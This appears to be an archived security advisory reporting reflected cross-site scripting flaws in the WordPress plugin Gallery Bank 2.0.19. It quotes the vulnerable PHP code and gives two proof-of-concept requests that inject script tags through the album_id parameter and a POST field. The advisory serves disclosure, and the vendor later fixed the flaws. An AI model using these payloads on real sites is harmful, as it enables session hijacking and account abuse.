Twenty Year Anniversary

WordPress Gallery Bank 2.0.19 Cross Site Scripting

WordPress Gallery Bank 2.0.19 Cross Site Scripting
Posted Nov 6, 2013
Authored by Sojobo Dev Team

WordPress Gallery Bank version 2.0.19 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 7a293e773b796eda70dbd81c037b1951

WordPress Gallery Bank 2.0.19 Cross Site Scripting

Change Mirror Download
[SOJOBO-ADV-13-03] - Wordpress plugin Gallery Bank 2.0.19 Reflected Cross Site Scripting

I. * Information *
==================
Name : Wordpress plugin Gallery Bank 2.0.19 Reflected Cross Site Scripting
Software : Gallery Bank 2.0.19 and possibly below.
Vendor Homepage : http://gallery-bank.com/ http://wordpress.org/plugins/gallery-bank/
Vulnerability Type : Reflected Cross-Site Scripting
Severity : Medium (3/5)
Advisory Reference : SOJOBO-ADV-13-03 (http://www.enkomio.com/Advisories)
Credits: Sojobo dev team
Description: A Reflected Cross Site Scripting vulnerability was discovered during the testing of Sojobo, Static Analysis Tool.

II. * Details *
===============
A) Reflected Cross Site Scripting in edit-album.php on admin panel [Impact: 3/5]

Follow a trace to reach the vulnerable code.

File: \gallery-bank\views\edit-album.php
36: $album_id = $_GET["album_id"];
..
50: <input type="hidden" id="hidden_album_id" value="<?php echo $album_id;?>" />

A test request is: /wordpress/wp-admin/admin.php?page=edit_album&album_id="><script>alert('xss');</script>

B) Reflected Cross Site Scripting in album-gallery-bank-class.php on admin panel [Impact: 3/5]

Follow a trace to reach the vulnerable code.

File: \gallery-bank\gallery-bank\lib\album-gallery-bank-class.php
620: $updateRecordsArray = $_POST['recordsArray'];
..
624: foreach ($updateRecordsArray as $recordIDValue)
..
626: $record_val .= $recordIDValue . ",";
..
669: echo $record_val . "_" . $string_to_postback;

A test request is: /wordpress/wp-admin/admin.php?page=add_album&action=album_gallery_library&param=reorder_td_control and
sending via POST the following data: recordsArray[]=<script>alert('xss');</script>

III. * Report Timeline *
========================

16 October 2013 - First contact
28 October 2013 - New version released

IV. * About Sojobo *
====================
Sojobo allows you to find security vulnerabilities in your PHP web application source code before others do.
By using the state of the art techniques Sojobo is able to identify the most critical vulnerabilities in your code and limit the number of false positives.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    3 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    18 Files
  • 6
    Sep 6th
    18 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    2 Files
  • 9
    Sep 9th
    2 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    17 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    29 Files
  • 14
    Sep 14th
    21 Files
  • 15
    Sep 15th
    3 Files
  • 16
    Sep 16th
    1 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    16 Files
  • 19
    Sep 19th
    13 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close